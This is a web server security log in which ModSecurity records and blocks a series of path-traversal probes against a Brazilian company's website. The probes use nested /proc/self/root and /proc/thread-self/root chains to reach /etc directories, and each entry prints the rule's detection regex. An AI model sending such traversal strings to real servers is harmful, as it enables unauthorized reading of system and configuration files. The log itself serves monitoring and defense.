[Wed Mar 18 09:09:11.979195 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:49954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV5-yqAr6etmhZHNqt_QAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:15.231173 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:35846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV6ymAPhZkrhU8w4lcxQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:15.441058 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:59698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV69a6ubjKNq_cu4aIRQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:16.744613 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:34234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV7Mdf6f5d65gmYZTEOQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:21.047453 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:42330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV8SmAPhZkrhU8w4lcygAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:22.415241 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:42332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV8tY0UrI5A3LftIySggAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:23.260662 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:59706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV89Y0UrI5A3LftIyShQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:24.482058 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:42854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV9OoXxyEfFpUF8f9eDAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:24.807183 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:42340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV9Pu8EFLIOrSqIpv0mgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:26.091994 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:42350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV9imAPhZkrhU8w4lczAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:27.403924 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:52812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV99Y0UrI5A3LftIySjAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:29.794902 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:52824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV-ew_le52K8_3pV3PRgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:31.038819 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:52830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV-ymAPhZkrhU8w4lc0gAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:33.388251 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:52844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV_UzinOy1jxa1j4cDlQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:35.761985 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:52854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV_-w_le52K8_3pV3PSQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:37.841777 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:42868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWASmAPhZkrhU8w4lc3AAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:39.148315 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:53116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWA-w_le52K8_3pV3PSgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:41.791748 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:52862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWBdY0UrI5A3LftIySmQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:47.315170 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:35218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWC-oXxyEfFpUF8f9eFwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:48.646442 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:35886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWDPu8EFLIOrSqIpv0pwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:51.040686 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:35890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWDymAPhZkrhU8w4ldBQAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:52.364680 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:35896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWENa6ubjKNq_cu4aIUwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:53.998964 2026] [:error] [pid 17653:tid 140411540502272] [client 216.73.216.191:57463] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWEcdf6f5d65gmYZTEUAAAAtg"]
